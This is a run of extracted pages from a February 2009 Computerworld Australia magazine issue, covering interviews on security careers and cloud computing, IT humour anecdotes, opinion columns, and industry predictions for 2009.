stand. Once its made clear to them what risk they entertain by doing cer-

tain shortcuts, it makes it easier for them to understand why they need to

spend the extra time and resources to produce a quality, secure product.

What do you think the enterprise security landscape will look like

in five years?

We should be thinking about whats going to be happening in encrypt-

ing. Well probably have quantum computing in not too many years, and

encryption codes that now would take 100 years to break can be broken

in a few minutes if you have the capability of quantum computing. So

there has to be some thinking on how we deal with things in light of new

computing.

So in five years, security will still be a big issue in IT?

Absolutely. Thats why I think theres such a growing need for security

professionals. Its what I see as the No. 1 recruitable position.

DossierName: W Hord Tipton

Title: Executive director, (ISC)2

Location: Palm Harbor, Florida

Favourite place: Alaska. Its wild, its verythinly populated, and it has great fishing andgreat hunting and all the outdoor things I like

to do. Ive been all the way from Juneau tothe Arctic Circle. Dream job: Sea kayakingtour guide in the Discovery Islands, east of

Vancouver Island, Canada.

Best workday ever: When I was [CIO in the USDepartment of the Interior] and the White House

determined that our IT architecture was the bestin government and a best practice. That was in

2005. It was so significant to me because whenI went into the job, it was the lowest-ranked ingovernment.

Favourite technology: It has to be computers.

Ive built 19 of them and a couple of servers;thats my hobby.

When he retires: I retired [from the Interior

Department in 2007]. I fished, I golfed, Ihunted, I worked 20 hours a week consulting.I liked that. Ill probably do it again unless

another exciting job like this pops up.

Favourite nonwork pastime: Thats easy:

playing with my granddaughter. Shes seven.


14/32

Opinion14 | www.computerworld.com.au | February 2009

aul Mngevaldson

SH RKTANK

Got a problem? Turn to IT

University IT department rolls out a new Webportal to simplify access to the schools various

information systems, reports a techie workingon the project. We marketed the heck out ofthe Web portal, purchasing balloons, mouse

pads and custom M&Ms, he says. To furtherfoster adoption, we put up a suggestion boxon the log-in page, asking for improvements

users would like to see on the new portal. Oneof our female students responded with thefollowing: I think hooks on the inside of the

bathroom stall doors would be beneficial to

students. At least for the women.

Why IT loves HRThis IT tech has worked his way throughuniversity at a supermarket chain, but with his

new IT degree, he applies for a job at an insur-ance company. One Friday afternoon at thesupermarket, the personnel department at the

insurance company called and asked me if Icould start Monday, he says. I explained thatI had given my word to the supermarket that I

would give two weeks notice. They said if notMonday, the offer would be withdrawn. Fast-forward two weeks: Personnel calls again.

Same scenario, Monday or else. I kind of liked

the supermarket job anyway. Fast-forward

another two weeks. Personnel called again.This time, they asked if I could give two weeks

notice and start two weeks from Monday. Weagreed, and two weeks later I went to work.First words from my new boss: I dont know

what took so long. We really could have usedyou a month ago.

Just one more thingIts time for this IT techs annual review. I getcalled into the bosss office, and we go over

the review, says tech. Our review is based ona 1-to-5 scale, where 3 is adequate, 1 is aboveand beyond the call of duty, and 5 means you

stink. Im getting nothing but 1s and 2s, andIm feeling pretty good. Boss asks, Any ques-tions? I say, Nope. Boss says, I have to lay

you off. I do a trout imitation.

Automation, redefinedWhile chatting with the manager of a depart-ment that prepares daily operation reports,this IT worker comments, With all your new

software, I would imagine that all of yourreports are automated now. Replies manager,Oh, yes, we dont do anything manually any-

more. We copy and paste everything now!

Happy now?

This IT worker writes a program to check activityon a particular server, then starts it up and leaves

it running. Results? The software to monitorthe server for errors had stopped working twomonths before, he says. The software to moni-

tor the server for intruders had stopped workingfour months before, and nobody had noticed.The server had several rogue sessions taking

up resources and slowing it down. The e-mailsystem had a stuck message in it. The networkhad an intermittent fault. The only thing working

properly was my program. A number of teamshad to sort out the errors and explain why theywere not picked up. Lets just say I am not the

most popular person with them at the moment.

Oops!This IT worker and his cohorts have worked out asystem for identifying laid-off co-workers. And itsreliable. . . mostly. We generally found out that a

colleague had been fired when we tried to call theperson and the office phone number no longerworked, he says. Things got a bit tense one day

when the phone system went on the fritz.

Send your true tales of IT life to sharky@com-

puterworld.com

Top 10 qualities of a great IT shopThe 10 most important practices to look for if moving to a new company or evaluating an ITshop as a consultant

NO TWO IT SHOPS CONDUCT BUSINESS IN THE SAME WAY: CIOsreport to various executives, project approval processes are all over theboard, and personnel policies are vastly different. Unlike other profes-

sions, IT doesnt seem to have a common set of basic principles acrosscompanies.

But some best practices have bubbled to the top. If I were anticipat-

ing a move to a new company or evaluating an IT shop as a consultant,here are the most important practices Id be looking for:

1. The CIO reports to the CEO or, at least, the chief operating

officer. This is vital to the success of the IT department. It gives the CIOclout and ensures ITs independence.

2. There is an IT steering committee composed of C-level execu-

tives from the business units. The executives make their decisionsbased on some set of priorities and criteria such as ROI. The committeeis necessary to ensure that allocation decisions are made in the inter-

ests of the entire company, not of an individual department.3. The IT shop uses up-to-date software and hardware. It should

also have reasonable policies for PC software upgrades and other regu-

lar system updates. In addition, the company should be spending anappropriate percentage of corporate revenue on IT. This indicates thecompanys level of commitment to IT.

4. There is a high-visibility system security team. Since security isone of the most vulnerable areas of IT, it must be well managed.

5. There is an ongoing disaster recovery process involving

users, and a documented recovery plan that is tested regularly.Commitment to security and disaster recovery indicates the importanceof IT to senior management.

6. There is an ongoing commitment to training to keep IT staffers

up to date. This should include attendance at technology conventionsas well as training seminars and industry events. If there is a lack of

training and a parallel use of consultants, you know that the focus isnot on in-house staff.

7. There is rigid adherence to some system development lifecy-

cle (SDLC) that is understood by IT and the user community alike.(Knowing how IT works helps users interact with IT more effectively.)Any of several SDLC plans may be used, depending on the type of project,

but the process of selecting the approach should be documented. Thisgives you some insight into the professionalism of the IT organisation.

8. There are established technical and managerial career paths

that enable workers to remain technical and achieve higher pay and

status within the organisation. This is the only way to retain top techni-cal people who have no interest in managing others.

9. IT produces, at minimum, a monthly status report that shows

progress on all major IT projects. This document should be widelydistributed throughout the company. Its existence shows the level of

interest of IT within the organisation.10. IT sits at the long-range planning table and participates. If

this is lacking, it is a sure sign that IT is looked at as an implementer

and not an enabler.These are the things I would look for in a top IT shop. I have seen many

shops that follow some of these practices, but few that follow all of them.

Paul M Ingevaldson retired as CIO at Ace Hardware in 2004

after 40 years in the IT business


15/32

OpinionFebruary 2009 | www.computerworld.com.au | 15

Paul Glen

AndreasAntonopoulos

Panic and how to prevent itHow IT managers should confront todays reality and tomorrows fears

THE YEAR AHEAD ISNT SHAPING UP TO BE A GOOD ONE FOR IT, to

say the least. As we settle into a recession, budgets are increasinglygoing to reflect the worsening business conditions. That means a year ormore of tough times for all of us. The sad reality is that more of us will

be looking for work in the next 12 months.And for those with jobs, its not going to be so pleasant either. When

times get tough, people feel stressed out, frazzled and nervous. Thats

not unreasonable. When people are faced with a combination of resourcelimits, personal insecurity and demands for productivity, emotionsrun high. There are no easy jobs left. Those of us lucky enough to be

employed have stressful jobs now.For managers, this represents a significant challenge. Stressed-out

knowledge workers do not perform at their best. Just when we need

people to focus and produce, they are distracted by the ugly realityoutside. You really cant expect people who are worried about their per-sonal financial security to completely shut out those thoughts in order

to concentrate on their work. But knowledge work requires exactly thatsort of composure.

To a degree, distraction is unavoidable. But as managers, we need to

do our best to help people stay on track and do that which is completelyunnatural: keep their eyes off their fears and on their work.

Doing this requires careful thinking about the emotional state of the

staff. Now more than ever, we need to realise that we are not managersof stuff, but of people who do stuff. We dont manage tasks; we managethe people who do those tasks. And people have emotions that affect

their performance.The most important emotional state to pay attention to right now is

panic. We have to help keep stressed-out staffers from becoming a pan-

icked mob. Stress may be unavoidable, but panic is not. As a consultant,

Ive seen lots of organisations and project teams under pressure. Somehave been composed and focused; some, stressed out; and others,panicked. Whats interesting is that the facts surrounding their work are

often similar. They are all under time and resource constraints, and manyare facing the same personal insecurity. But they respond differently.

Ive noticed that one of the key differences is in how the managers of

these groups respond to those facts. Managers who deny reality generallydont fare too well. Telling people, Theres no problem here; what are youworried about? usually convinces the staff that you are either an idiot or

a liar. Neither is a useful image. Managers who try to tell their peoplewhat they should or shouldnt feel about reality generally dont fare welleither. Telling people You shouldnt worry about this usually gets them

worrying. Managers who panic themselves are the most likely to inducepanic in their people.

The teams that do the best seem to be those whose managers openly

acknowledge reality and meet it with determination rather than trepida-tion. And how you respond is more important than anything you say.When you establish a common frame for reality and convince everyone

that you see the same challenges they do but are willing to take them on,you demonstrate the best response.

Having done that, you need to focus attention on the things you can

control on the activities that will give the best chance for success. Ifthose around you see the possibility of a better future and feel that theyhave the power to be part of creating it, they are most likely going to

respond well, no matter how challenging reality may be.

Paul Glen is the founder of the Geekleaders.com Web community

MY PREDICTIONS FOR INFORMATION SECURITY in 2009 are just pre-dictions, not recommendations. I am trying to guess what will happen,not suggesting what should. As always, take these with a grain of salt.

Though these predictions are based on primary research and many,many discussions with CSOs, they concern information security onlyand can be affected by external factors that are unpredictable (at least

by me). Case in point: My predictions for 2008 did not take into accounta severe downturn in the economy that was underway already at thebeginning of the year. Lets hope that my 2009 predictions also miss the

mark by assuming a continuation of economic difficulties that turn outto be less severe than predicted. Here goes:

Host-based security becomes the focus for 2009. The imminent

release of Windows 7 and the continued interest in Mac OS and Linuxas alternative desktops are once again focusing attention on operating-system and endpoint security.

Mobile security concerns and solutions grow. The Android andiPhone platforms continue to grow, and with them comes an ecosys-tem of independent application developers. With mobile platforms truly

becoming platforms for all kinds of new applications, security issuesare not far behind. 2009 could be the year of the first widespread securityscare on a mobile platform. Perhaps a rogue application? A Trojan?

Encryption grows. At-rest encryption of hard drives on all desk-top systems becomes the norm. Servers still lag behind. Encryption ofmobile-device storage starts getting interesting. And once again in 2009,

its still impossible to send an encrypted e-mail to someone without

making special arrangements in advance. Public-key infrastructure (PKI)encryption remains fragmented in small disconnected islands. Ugh.

No news is bad news. There are no new, high-profile, fast-spreading

mega-worms. The world rejoices at the defeat of malware. Meanwhilesuper-stealthy malware spreads further than ever before, and those inthe know quietly weep.

New botnets are discovered and theyre bigger than ever. The mal-ware industry feeds the ever-increasing botnet industry. As usual, mostof the innovation happens on the other side of the industry. Botnet

makers continue to build incredible distributed, encrypted, anonymous,unbreakable command-and-control systems. Who said there are noprofits to be made in 2009? If only BTNT was a publicly traded stock!

Regulatory compliance is back with a vengeance. All the scan-dals and Ponzi schemes you heard about in 2008 become subtitlesfor new regulations in 2009 and beyond. Regulations in hedge funds,

credit-default swaps and derivatives are just the beginning. A whole newindustry of auditors, special software and consultants rises up to meetthe challenge. You thought SOX was a pain? Just wait.

Security projects struggle for funding. It will take a lot of arguingto get a budget for more than upkeep in 2009. But wait, regulatory com-pliance comes to the rescue: Use compliance to push through budget

requests on everything. Its 2007 all over again!

Andreas Antonopoulos is a senior vice president and founding part-

ner at Nemertes Research, an independent technology research firm

Security predictions for 2009On botnets, encryption and mega-worms . . .


16/32

Storage16 | www.computerworld.com.au | February 2009

John Scumniotales

Cloud computing may be the answer for organisations looking to boosttheir server and storage utilisation rates without increasing the workforce

supporting those systems, says Nicholas Carr, author of The Big Switch:

Rewiring the World, From Edison to Google(WW Norton, 2008). Carr toldThomas Hoffman that he thinks the cloud will enable companies to lower

their capital equipment costs and reinvest IT money in other areas, such

as new product development.

Why should Fortune1000 CIOs trust the reliability of the cloud?

If you look overall at the records of Amazon.com and Salesforce.com,

theyre actually quite good. But theyre not perfect, and I dont think theyll

ever be perfect, any more than any companys internal systems are. But

I think what were going to see is that over time, the reliability of these

cloud systems is going to steadily increase. And eventually, if not already,

theyre going to be more reliable than the average companys systems

are.

Well see different things move to the cloud in different stages, and

one of the criteria will be, How reliable do you need this system to be?

For instance, I was speaking a few weeks ago to some federal gov-

ernment CIOs, including some from the intelligence community, and its

pretty clear that there are some sorts of systems that need to be basically

bulletproof. And I think its going to be a long time before companies and

governments are going to trust those types of applications to the cloud.

But from what weve seen already, whether its Amazons infrastructure or

various software-as-a-service offerings, even now, the reliability is good

enough for a lot of corporate applications.

Another top concern among IT execs is how to avoid getting locked

into a particular vendors cloud service. I think buyers should be worried

about lock-in. If were going to have the kind of interoperability and stand-

ardised data formats necessary to ensure fairly easy migration among

The Big Switch tocloud computingNicholas Carr touts reliability but fears vendor lock-in

Thomas Hoffman

Photo courtesy Jason Grow


17/32

StorageFebruary 2009 | www.computerworld.com.au | 17

vendors, its going to have to be the buyers pushing the vendors to move

in that direction. Unless the buyers make that a demand for doing busi-

ness with a vendor, I fear that well see a lot of vendors even if they talk

a good game about standardisation actually pursue strategies to make

it hard to get off their clouds, to quote Mick Jagger.

How concerned should CIOs be about the possibility of Microsoft,

Google and other heavyweights coming to dominate the cloud?

When we look ahead and try to figure out the ultimate structure of the

cloud or the computing utility industry, there are a lot of open questions.

But when we look at the infrastructure side, it certainly appears to be a

very capital-intensive operation. So were seeing companies like Google

and Microsoft spending billions of dollars a year, and that leads me to

believe that because of the capital expense of building these networks,

theres going to be a relatively small number of suppliers who can afford

to build them.

So that in itself raises some red flags. But another question is, what

about the services, the applications that ride on top of that infrastructure?

Will that remain sort of a separate business with lots of providers compet-

ing? Or will the Googles of the world suck up those applications as well?

Will we see a small number of vendors holding power over both the

infrastructure and the applications?I dont really know. Regulations will play some part in it and also the

ability of a company like Google to innovate in a way thats attractive for

businesses, which it really hasnt done much of yet.

How do CIOs make the big switch without decimating their IT

staffs and placing their own jobs at risk?

One of the advantages of the cloud is that it allows you to not only reduce

your capital expenditures in IT but to reduce your IT staff. And if it didnt, it

wouldnt be that attractive, because IT labour costs are such a big part of

IT costs. So as CIOs look ahead, they should come to grips with the fact

that this may mean that their empire may shrink.

On the positive side, as the head count shrinks, their visibility and

importance to the business may increase as they move away from man-

aging the machinery and the applications and the licences to focusing

more on the business logic. But if you go into it thinking, I can only do

something that allows me to maintain my current staff or to expand my

staff, youre probably going to run into roadblocks with the cloud pretty

quickly.

Some companies that have outsourced their IT operations still

retain staff in-house to work with outsourcers and users. Would you

expect to see the same type of model playing out in the cloud?

I think so. Cloud computing is a form of outsourcing, using outside suppliers.

And I think it will tend to have that same effect on IT shops. There will be

some kind of information systems broker who, similar to the people who

manage outsourcing relationships, figures out how we distribute our sys-

tems and our requirements and applications among these cloud providers.

You still need somebody to make the connection between the busi-

ness and the application, though in a radical scenario, that job may move

outside the IT department and into the businesses themselves.

How should CIOs change the way they approach IT in light of the

troubled economy?

Clearly and this is something that CIOs have gotten used to this

decade, for better or for worse cost is going to continue to be a big

factor. I think the judicious use of the cloud can help in that [regard],

because it does allow you to avoid capital investments, which can be very

hard to make a case for now.

Running counter to that, companies tend to get very conservative in

periods of economic tumult, and even experimenting with new models

such as cloud computing may begin to be difficult. But compared to a few

years ago, there are more options now for getting more IT capability at

the same or a lower price. Companies shouldnt be afraid to explore those

options and experiment with them.

Might recent investments in virtualisation keep large companies

from making a wholesale switchover to cloud computing, at least

in the short term?

I dont think big companies are going to make a wholesale switchover tothe cloud, because I dont think the cloud is ready for all the things that

companies do internally in IT.

But I think virtualising your own IT infrastructure is going to make it

easier in the long run to pull in more and more capabilities from the cloud,

or begin to use the cloud as basically an extension of your own data

centre so that every time you get an upsurge in demand for a particular

application, youre not faced with the need to go out and buy a lot of new

servers. You can use the cloud as kind of an add-on and expand to it.

You were interviewed by Stephen Colbert on The Colbert Report

recently. What was that like?

I watch the show a lot, so I kind of knew what I was getting into. But my

wife was like, Dont do it! Dont do it!

The producer told me to make a few points, try to be serious and clear,

and try to ignore [Stephen Colbert] because hes going to try to play off

you and trip you up. And that was good advice. It was fun, actually.

Youve said that Google has made us all stupid. But some research

suggests that the Internet may stimulate some neural activity.

I think [it] can do both things. The study youre talking about showed that

when we use the Internet, a lot of the areas of our brains are active,

including decision-making parts that arent very active when we read.

But [I wonder about] the quality of thinking thats going on in your brain.

[If] so many areas of your brain are activated when youre online, does

that hinder the type of concentration and reflectiveness that occurs when

youre sitting quietly reading?

One of the advantages of the cloud is that it allowsyou to not only reduce your capital expenditures in

IT but to reduce your IT staff


18/32

Forecast 200918 | www.computerworld.com.au | February 2009

Forecast 2009:The yearahead for ITMichael WarrilowManaging directorHydrasight1. Cloud computing will begin to

occupy the thoughts and strategies

of most IT organisations. While

there are many possible definitions

and interpretations for cloud com-

puting a problem that will lead to

increased confusion in 2009 the

underpinnings for cloud computing

in the enterprise are straightfor-

ward. Namely, that the server-

centric computing model is (slowly)

returning to favour on a globally-connected scale. Moreover, we

believe that addressing variability

in demand for computing resources

and solutions will make traditional internal/on-premise solutions increas-

ingly cost and time prohibitive. While the implementation styles for cloud

will often be very different, the underlying principles of resource sharing

will pervade all major solutions. In that sense, cloud computing is not so

much a revolution as a major contributor to the IT industrys evolution.

2. The downturn in the economic environment will force a major

(re)focus on cost reduction. However, the extent of the fall in IT spend-

ing will not mirror the post-Y2K hangover of 2001 if only for the fact

that IT budgets have been more tightly managed in recent years. Whats

more, most of the banks and (federal) government departments began to

tighten their belts in 2008. Regardless of the starting point, every major

RFT and contract review will be subject to extreme scrutiny on reducing

expenditure. Savvy CIOs will use the current opportunity to capitalise on

labour restructuring, to negotiate more favourable licence and support

contracts as well as to reset operational performance expectations within

the business. Moreover, they will use technology as a reason to restruc-

ture the business.

3. Green IT will become subsumed into broader organisational pro-

grams and roles for environmental and social responsibility compliance.

In the process, Green IT will increasingly be viewed as a subset of doing

greener business. During 2009, the environmental sustainability market

will be thrown into a state of confusion resulting from legislation that, com-

bined with vendor opportunism, will lead to a questioning of confidence.

4. Virtualisation: As server virtualisation adoption rates continue to

increase, IT organisations will be forced to place greater focus on man-

aging virtualised environments and integration with existing manage-

ment tools and processes as well as a variety of "point" solutions. The

perceived success will continue to drive investigation of desktop virtuali-

sation during 2009. However, the vast array of options and approaches

available will confuse the majority of organisations. Leading organisa-

tions will begin to recognise the opportunity to leverage their existing

server virtualisation efforts to facilitate early cloud deployments.

5. Video conferencing and telepresence will slowly increase in

adoption due to often-misguided beliefs about the cost savings and

environmental benefits. Despite the absence of any greater measures

of success or rewards over previous video conferencing initiatives many

organisations will nonetheless make substantial over-investments in fixed

location video-based collaborative technologies. Moreover, 2009 will seean increase in the perceived failure of unified communications projects.

6. Mobile computing: Due in no small part to the iPhone, there will

be a renewed business focus on dedicated remote devices, especially for

delivery and capture of field data. The high cost of poor data quality will

be highlighted by renewed interest in organisational efficiency projects.

However, until local economic conditions improve, only those projects with

a direct, tangible cost benefit analysis will proceed. Ultimately, 2009 will see

an increasing awareness of the reality of moving away from managing the

development and deployment of applications on specific devices to ena-

bling secure information access irrespective of device, platform or location.

7. Microsoft Windows: Despite Windows Vistas perceived fail-

ure, Windows 7 will prove to be no more compelling or attractive for

the majority of organisations during 2009. Enterprise upgrades to Vista

will nonetheless proceed during 2009, but on a less aggressive scale

than Microsoft would undoubtedly like. Management and administra-

tion costs for the Windows platform will generally continue to increase

as organisations become more dependent on the technology. However

many of these costs will be obscured by complex cross charging and

line-of-business/workgroup specific resources that become considered

business roles rather than IT roles.

8. Business intelligence: Information analysis will consume sub-

stantial business and IT resources during 2009 as organisations attempt

to better understand and remediate the impact of the financial downturn.

Interest in, and use of, business intelligence, analytics and modelling

tools will increase, though adoption will be broadened across the enter-

prise rather than being substantially transformative.

Experts weigh in with theirpredictions of what will

be hot and not in IT for 2009


19/32

Forecast 2009February 2009 | www.computerworld.com.au | 19

Ross DawsonChairmanFuture Exploration Network

The last year of the decade will bring more change than any other

year this decade, says Ross Dawson, chairman of Future Exploration

Network, a global consulting firm that helps companies understand the

future.

Perversely, a slowing economy will accelerate the pace of change,

says Dawson. Many companies will take advantage of the downturn to

use technology in innovative ways. Technology ranging from mobile appli-cations to online gaming will become an everyday part of our work lives.

Social change tends to be faster in a downturn, notes Dawson. Our

attitudes to what is acceptable behaviour by the government and compa-

nies will rapidly evolve. Technology is shaping society, but society is also

shaping technology, particularly in how it allows us to express forcible

opinions.

Dawson points to six important forces that will shape business and

society in 2009:

1. Constant Partial Attention: 2009 will see more people consuming

20 hours or more of media a day. And no, its not just the insomniacs. It is

due to a phenomenon called Constant Partial Attention, or CPA, in which

our attention is constantly divided between a massive array of channels

now including mobile Internet, video screens on buses, and more. Over

two-thirds of people watch TV while reading. To be successful, we need

to thrive on constant interruption.

2. Half of us expose ourselves; the other half watches: 2008 saw

a surge in Australians using Twitter the worlds most popular micro-

blogging platform. As a result, people are becoming more and more

comfortable living their lives online. In 2009, expect to see more of your

friends. Literally. With increased access to online video technology, and

mobile data plans getting cheaper, sending video updates of our every

move will seem normal.

3. Gen Y wakes up to Gen Z: In 2009, Generation Y (1979-1990)

wont be the new kids on the block any more as Generation Z enters

the workforce. The me generation will wake up to dramatically changed

conditions in the workforce, including younger competition, after expect-

ing instant rewards for years. Sophisticated and with a social conscience,

Gen Z has never lived without the Internet or mobile phones. Their adapt-

ability and early experience of economic woes will create new challenges

and opportunities for employers.

4. Outsourcing for the masses: Outsourcing used to be for banks

and telcos. This year will see a big increase in outsourcing for us mere

mortals. Many will use assistants in India or Hungary to make travel book-

ings, set up a personal Web site, or design a flyer for the school fete.Australian company 99designs is letting companies small and large tap

designers all over the world, and Australians are among the leading users

of online outsourcing services.

5. Companies become social: In 2009, companies will truly embrace

social networks, blogs, and other Web 2.0 tools, bringing new ways of

connecting into the workplace. From zero users just two years ago,

now over 3.5 million users Australians are socialising using Facebook.

Companies are realising that better connected staff are good for busi-

ness. Westpac, Lend Lease and Deloitte are just some of the companies

paving the way for a transformation of how we work.

6. Media industry shatters: Major Australian media companies could

fall in 2009. They have seen the rivers of gold of print classifieds rapidly

shift to the Internet. In the US, classified advertising has fallen by over

60% in the last two years, and newspapers including Christian Science

Monitor have stopped printing, shifting to solely online. Journalists them-

selves will prosper having the most relevant skills in an information

age but for many their future wont be in traditional journalistic roles.

Simon ElishaChief technologistHitachi Data Systems Australia & New Zealand

1. Doing a double take on data

deduplication: While data dedu-

plication moved quickly from dis-

cussion to implementation, in

2009 organisations will realise

that there is still a home for tape intheir backup environment. In some

cases the cost of data deduplica-

tion does not always merit the solu-

tion, making a 50/50 mix of disk and

tape the preferred option for 2009

and beyond.

2. Going beyond a pragmatic

green approach: The increasing

cost of power, lack of available data

centre space and imminent Carbon

Trading Scheme will put increased

pressure on organisations to imple-

ment tangible Green IT strategies.

While most organisations have adopted a pragmatic green approach to

date, Government departments will lead the Green IT agenda in 2009 by

implementing best practices that deliver benefits for the environment and

the bottom-line. Financial organisations will quickly follow suit.

3. Feeling the skills squeeze: Organisations will shed or freeze

headcount in their IT departments, making easy-to-use technologies that

allow IT professionals to do more with less paramount. With the eco-

nomic downturn comes the greater availability of highly skilled IT staff.

Progressive organisations will use this to their advantage to make hires

in 2009 that will position the company for growth in the future.

4. Deciding to defer, defer, defer: Deferring IT projects will become

the norm in 2009 as the economic downturn worsens. Technologies like

thin provisioning and storage virtualisation will continue to grow in popu-


20/32

Forecast 200920 | www.computerworld.com.au | February 2009

larity as organisations turn to technology to get more juice out of their

existing infrastructure and defer future IT investments until tough times

improve. Progressive organisations will use 2009 as a time to get their

house in order and implement IT projects that deliver a measurable ROI.

5. Introducing annoying archiving: Data archiving will become

sufficiently annoying, especially in large organisations as the growth of

unstructured data continues to escalate. In 2009, organisations will start

to view archiving as a strategic rather than tactical activity that unlocksthe value of information to the entire organisation. Active archiving solu-

tions will become more integral to an organisations information manage-

ment initiatives, and many organisations will move there their tier two

storage to this archival tier.

David BarnesManaging directorUnisys Australia & New Zealand

Australian organisations will look to their IT departments as the global

economy tightens to help adapt quickly to changing market conditions by

stabilising internal processes, delivering greater efficiency and enhancing

cost management.

The five areas of technology that Unisys predicts will drive IT strategy

in 2009 are:

1. Automation: Automation tools will allow IT infrastructure to quickly

and automatically respond to changing business demands based on pre-determined rules.

2. On-demand service delivery: Utility computing models will experi-

ence a greater take-up in 2009 as businesses look to pay only for what

they use.

3. Centralised IT infrastructure: Knowledge management and mod-

elling methodologies will be used to track interdependencies across an

organisation so that management can take a whole of company view

of all facets of their organisation and provide an equitable service for all

employees whilst removing unused applications.

4. Better asset management: Under-utilised IT resources will

become a large focus for companies looking to identify wasted resources

and improve organisational efficiencies.

5. Being green an added benefit only: Solutions that help organi-

sations meet their green commitments will only be an added benefit in

2009 not a primary decision driver as businesses look to protect their

bottom line first and foremost.

Dr Michael HarriesDirector of technology strategyCitrix Systems1. Everyones heads will be in the

clouds: With increased interest in

cloud computing, enterprises will

start looking to leverage the ben-

efits of the cloud. But this is not an

all or nothing move while every-

ones heads will be in the cloud theirfeet will still firmly be planted on the

ground. The cloud brings new IT

capabilities to the IT toolbox and

should be treated as just part of the

enterprise IT architecture strategy.

IDCs Predictionsfor 2009Analyst firm IDC predicts current

economic crisis will still provide

for pockets of opportunities

within the Asia-Pacific

Despite the global economic slow down, IDC

believes that in

the grill: (isc) 2’s w hord tipton

Documents